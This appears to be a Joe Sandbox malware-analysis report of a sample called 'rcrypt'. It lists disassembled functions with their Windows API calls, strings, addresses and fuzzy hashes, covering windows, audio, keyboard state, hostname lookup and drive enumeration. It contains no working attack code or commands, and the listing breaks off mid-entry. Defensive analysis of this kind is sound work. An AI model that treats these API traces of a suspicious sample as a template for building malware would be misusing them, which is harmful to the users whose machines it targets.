Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 1332416105247299575062c020f0ad195d2509ae7aea5159a3a87bc6952ff11a
Instruction ID: e9c707f7525a3cbe0530a54089f66a02c62dd217df33cb5a3ffb2b7f8efc94dc
Opcode Fuzzy Hash: 1332416105247299575062c020f0ad195d2509ae7aea5159a3a87bc6952ff11a
Instruction Fuzzy Hash: 3441AF3450428E9BCF15EF94ED91AEA3734BF26310F518024FD956B283DB70A99ACB51

Function 0017772A Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001777CD
CreateCompatibleDC.GDI32(00000000), ref: 001777D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001777E7
SelectObject.GDI32(00000000,00000000), ref: 001777EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 001777FA
DeleteDC.GDI32(00000000), ref: 00177803
GetWindowLongW.USER32(?,000000EC), ref: 0017780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00177821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0017782D

Strings

@U=u, xrefs: 001777E7
static, xrefs: 00177765

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: 21ca23cedc3d5f9680bd7b26e2104fee7d9f296845627095a6a1f960498e0b17
Instruction ID: 36d54e7998fac81d29a23fcf711ab1e5d2f6a46fd84c35972327dd929989102e
Opcode Fuzzy Hash: 21ca23cedc3d5f9680bd7b26e2104fee7d9f296845627095a6a1f960498e0b17
Instruction Fuzzy Hash: DC315A31105215ABDB159FA4DC09FDB3B79FF0D321F114228FA19A61E0C7319892DBA4

Function 00155569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Part of subcall function 000F7A84: _memmove.LIBCMT ref: 000F7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001555D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001555E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001555F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0015560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0015561C

Strings

open , xrefs: 00155581
status PlayMe mode, xrefs: 001555CD
alias PlayMe, xrefs: 001555AB
play PlayMe wait, xrefs: 00155606
play PlayMe, xrefs: 00155617
close PlayMe, xrefs: 001555E3, 00155610

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: afff4074e8d202849f845fb749e392a218452dc09134796b09fabbe864adf50b
Instruction ID: 32b5e66eb991fab3978798c7b83b2e426e7be3591344c1c99fd1addc9cf9759f
Opcode Fuzzy Hash: afff4074e8d202849f845fb749e392a218452dc09134796b09fabbe864adf50b
Instruction Fuzzy Hash: 9C11B23096016DB9DB20B661CC5ADFF7B7CFF96B00F800469B915A60D2EFA00D09C5A3

Function 001548F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0015490E
gethostname.WSOCK32(?,00000100), ref: 00154928
gethostbyname.WSOCK32(?), ref: 00154935
_wcscpy.LIBCMT ref: 0015495D
_memmove.LIBCMT ref: 00154970
inet_ntoa.WSOCK32(?), ref: 0015497B
_strcat.LIBCMT ref: 00154989
_wcscpy.LIBCMT ref: 001549A0
WSACleanup.WSOCK32 ref: 001549AE
_wcscpy.LIBCMT ref: 001549BC

Strings

0.0.0.0, xrefs: 00154957

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: b58bea76e0f2e74b6eabef1f920ad57a6b4bb5f61f4d146c8b30c2d2c7621d8c
Instruction ID: 48af497cda7d402268e02cd5befd5032b22cae6486588c432a1f13e4884d72ef
Opcode Fuzzy Hash: b58bea76e0f2e74b6eabef1f920ad57a6b4bb5f61f4d146c8b30c2d2c7621d8c
Instruction Fuzzy Hash: 8711E732904115EBCB28EB24DC06EDB77BCEF15719F040179F9599A051EF709AC6C792

Function 0015D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

CoInitialize.OLE32(00000000), ref: 0015D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0015D8E8
SHGetDesktopFolder.SHELL32(?), ref: 0015D8FC
CoCreateInstance.OLE32(00182D7C,00000000,00000001,001AA89C,?), ref: 0015D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0015D9B7
CoTaskMemFree.OLE32(?,?), ref: 0015DA0F
_memset.LIBCMT ref: 0015DA4C
SHBrowseForFolderW.SHELL32(?), ref: 0015DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0015DAAB
CoTaskMemFree.OLE32(00000000), ref: 0015DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0015DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 0015DAEB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 055f08da0cc2907375ba9671ef89bb2f67f19a74203eb7661690cf3ac69112aa
Instruction ID: 3542a3a9f76e47f8192e3b3c7485f82b6b0dfadcd3bb7c6bdc6e8871c46435aa
Opcode Fuzzy Hash: 055f08da0cc2907375ba9671ef89bb2f67f19a74203eb7661690cf3ac69112aa
Instruction Fuzzy Hash: 0CB10C75A00108EFDB14DFA4D884EAEBBB9FF48305B148469F919EB261DB30ED45CB51

Function 0015052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001505A7
SetKeyboardState.USER32(?), ref: 00150612
GetAsyncKeyState.USER32(000000A0), ref: 00150632
GetKeyState.USER32(000000A0), ref: 00150649
GetAsyncKeyState.USER32(000000A1), ref: 00150678
GetKeyState.USER32(000000A1), ref: 00150689
GetAsyncKeyState.USER32(00000011), ref: 001506B5
GetKeyState.USER32(00000011), ref: 001506C3
GetAsyncKeyState.USER32(00000012), ref: 001506EC
GetKeyState.USER32(00000012), ref: 001506FA
GetAsyncKeyState.USER32(0000005B), ref: 00150723
GetKeyState.USER32(0000005B), ref: 00150731

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c5152d8483c63bd8086988d92d1105704226f22e750bc989f4605f3c5c3e152d
Instruction ID: 227edc4bf339c9baf59926601831fe0c1973edb8b19aa0a420dbdd8a11fa7892
Opcode Fuzzy Hash: c5152d8483c63bd8086988d92d1105704226f22e750bc989f4605f3c5c3e152d
Instruction Fuzzy Hash: 66510B60A04784A9FB36DBF088547EABFB49F19381F08459DCDD25E1C2EB649B8CCB51

Function 0014C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0014C746
GetWindowRect.USER32(00000000,?), ref: 0014C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0014C7B6
GetDlgItem.USER32(?,00000002), ref: 0014C7C1
GetWindowRect.USER32(00000000,?), ref: 0014C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0014C827
GetDlgItem.USER32(?,000003E9), ref: 0014C835
GetWindowRect.USER32(00000000,?), ref: 0014C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0014C889
GetDlgItem.USER32(?,000003EA), ref: 0014C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0014C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0014C8C1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: dfa06f37e8dedc10d141a511f187eadcb2c996b103d062383b072b3ff4d24776
Instruction ID: db34bef8760ce15af9c0f802d00805b1a0fa50182b5908f68403610e24053a49
Opcode Fuzzy Hash: dfa06f37e8dedc10d141a511f187eadcb2c996b103d062383b072b3ff4d24776
Instruction Fuzzy Hash: 96513F71B00205AFDB18CFA9DD89AAEBBBAFB88711F14812DF519D72A0D7709D418B50

Function 000F201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000F2036,?,00000000,?,?,?,?,000F16CB,00000000,?), ref: 000F1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 000F20D3
KillTimer.USER32(-00000001,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 000F216E
DestroyAcceleratorTable.USER32(00000000), ref: 0012BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000F16CB,00000000,?,?,000F1AE2,?,?), ref: 0012BF5A
DeleteObject.GDI32(00000000), ref: 0012BF6C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 499b9018600bbd10abf12db523ef470efcb0123fd9d3a1044977cee088465f3c
Instruction ID: fe14ae2b8d822acb82009fb40cece6c51043909c22d8968fb2721f16e6304346
Opcode Fuzzy Hash: 499b9018600bbd10abf12db523ef470efcb0123fd9d3a1044977cee088465f3c
Instruction Fuzzy Hash: 61616832104714DFCB359F15DA89B3AB7F2FB64312F108528E64686E61CB79A8D1EF40

Function 000F21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC

GetSysColor.USER32(0000000F), ref: 000F21D3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: e04c4e6cf9d03785b696ce9ba536a49153cbc2e354bd48d37de194d7ec902b84
Instruction ID: 2ae62a8a786216d69ae42f83c93c2bc147a90c6c216f715d487d870caefce651
Opcode Fuzzy Hash: e04c4e6cf9d03785b696ce9ba536a49153cbc2e354bd48d37de194d7ec902b84
Instruction Fuzzy Hash: 4C41B431104154EFDB615F28EC88BB93BA5EB06331F584265FF658A5E2C7318C92EB61

Function 0015AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0017F910), ref: 0015AB76
GetDriveTypeW.KERNEL32(00000061,001AA620,00000061), ref: 0015AC40
_wcscpy.LIBCMT ref: 0015AC6A

Strings

unknown, xrefs: 0015AC01
cdrom, xrefs: 0015AB92
removable, xrefs: 0015ABA8
network, xrefs: 0015ABD4
fixed, xrefs: 0015ABBE
ramdisk, xrefs: 0015ABEA
all, xrefs: 0015AB7C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 6df3e9a54a47ce9cc6b365b2a6992b6807302d4d8d304faf8c0296d4d090419a
Instruction ID: f678e61a357060b1ac6246c3f3f694f062055f15a9bb3d2315989d9494c931af
Opcode Fuzzy Hash: 6df3e9a54a47ce9cc6b365b2a6992b6807302d4d8d304faf8c0296d4d090419a
Instruction Fuzzy Hash: 2A51EE30588305DFC714EF14C881AAEB7A5FF94311F90492DF9A65B6A2DB31DD4ACA83

Function 001788B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0017896E

Strings

@U=u, xrefs: 001789A4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: bb6a85cbb316b2ded4d4ddd101bdf9ded97b317c672dc4dfbc9568522bf833bc
Instruction ID: 26f0e24daec22e4d3a659f95aaa072df3c232fb8ff7c9246100b02f66944962a
Opcode Fuzzy Hash: bb6a85cbb316b2ded4d4ddd101bdf9ded97b317c672dc4dfbc9568522bf833bc
Instruction Fuzzy Hash: 6B518530580208BFDF249F28CC8DBAA7B75BB15314F608526F61DE75A1DF71A9C09B52

Function 000F2B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0012C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0012C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0012C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0012C5C0
DestroyIcon.USER32(00000000), ref: 0012C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0012C5EC
DestroyIcon.USER32(?), ref: 0012C5FB

Part of subcall function 0017A71E: DeleteObject.GDI32(00000000), ref: 0017A757

Strings

@U=u, xrefs: 0012C5C0, 0012C5EC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID: @U=u
API String ID: 2819616528-2594219639
Opcode ID: 212373b78c4a334e65ebaa72542a2758818c7a79aec002abb2cf4832b212b567
Instruction ID: d8bb93e58758fb3cec5fc6a331ed4dd0bbe3886a6cce8172f8f589f29f174d5d
Opcode Fuzzy Hash: 212373b78c4a334e65ebaa72542a2758818c7a79aec002abb2cf4832b212b567
Instruction Fuzzy Hash: 30514870A00209EFDB24DF25DC45BBE37B5EB58710F104528FA06A7AA0DB70ED91EB90

Function 000F9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 000F99C2
__swprintf.LIBCMT ref: 000F9A0C
__i64tow.LIBCMT ref: 0012FA0F

Strings

False, xrefs: 0012F9D7
True, xrefs: 0012F9D0
0x%p, xrefs: 0012F9F1
%.15g, xrefs: 000F9A06

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 6e843bb24e365fd68bfcd7664db813ce370c49fdda1ac5701a0006d01413855b
Instruction ID: 6bbd8d64dbf5936077db0850693884f8b12367f869b9306fb996b42c001520e6
Opcode Fuzzy Hash: 6e843bb24e365fd68bfcd7664db813ce370c49fdda1ac5701a0006d01413855b
Instruction Fuzzy Hash: 5E41C471504219ABDB28EF38E842F7A73F4AB48304F24447EF649D6291EB719982DB11

Function 001773C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001773D9
CreateMenu.USER32 ref: 001773F4
SetMenu.USER32(?,00000000), ref: 00177403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00177490
IsMenu.USER32(?), ref: 001774A6
CreatePopupMenu.USER32 ref: 001774B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001774DD
DrawMenuBar.USER32 ref: 001774E5

Strings

0, xrefs: 001773CF
F, xrefs: 001774D1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 1f32a2ede202272161f0a2d2abf0de71d3c411c68998fedb7cdb347129d7b1c1
Instruction ID: 0a8740bfb195968140d1bf6cff92a254e831fb6e1c82a05982889053e2aa4f66
Opcode Fuzzy Hash: 1f32a2ede202272161f0a2d2abf0de71d3c411c68998fedb7cdb347129d7b1c1
Instruction Fuzzy Hash: E9414975A04209EFDB10DF64D888E9ABBF5FF49310F144029F95A973A0D731A950CF50

Function 00149471 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001494F6
GetDlgCtrlID.USER32 ref: 00149501
GetParent.USER32 ref: 0014951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00149520
GetDlgCtrlID.USER32(?), ref: 00149529
GetParent.USER32(?), ref: 00149545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00149548

Strings

ListBox, xrefs: 001494B3
@U=u, xrefs: 00149548
ComboBox, xrefs: 0014947E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: @U=u$ComboBox$ListBox
API String ID: 1536045017-2258501812
Opcode ID: 453869be04a34c1272e1d10719d85c1978ab2f61d0a2a0cb78300781c83fff83
Instruction ID: 93ef688418755ea950dcef2b6ab12c53c4bee48316dc9ebddab3d5fe1e901953
Opcode Fuzzy Hash: 453869be04a34c1272e1d10719d85c1978ab2f61d0a2a0cb78300781c83fff83
Instruction Fuzzy Hash: B221C174D04208BBCF05AF64CC85DFFBB74EF49310F14012ABA61972A2DB759959DB20

Function 0014955C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001495DF
GetDlgCtrlID.USER32 ref: 001495EA
GetParent.USER32 ref: 00149606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00149609
GetDlgCtrlID.USER32(?), ref: 00149612
GetParent.USER32(?), ref: 0014962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00149631

Strings

ListBox, xrefs: 0014959E
@U=u, xrefs: 00149631
ComboBox, xrefs: 00149569

Memory Dump Source

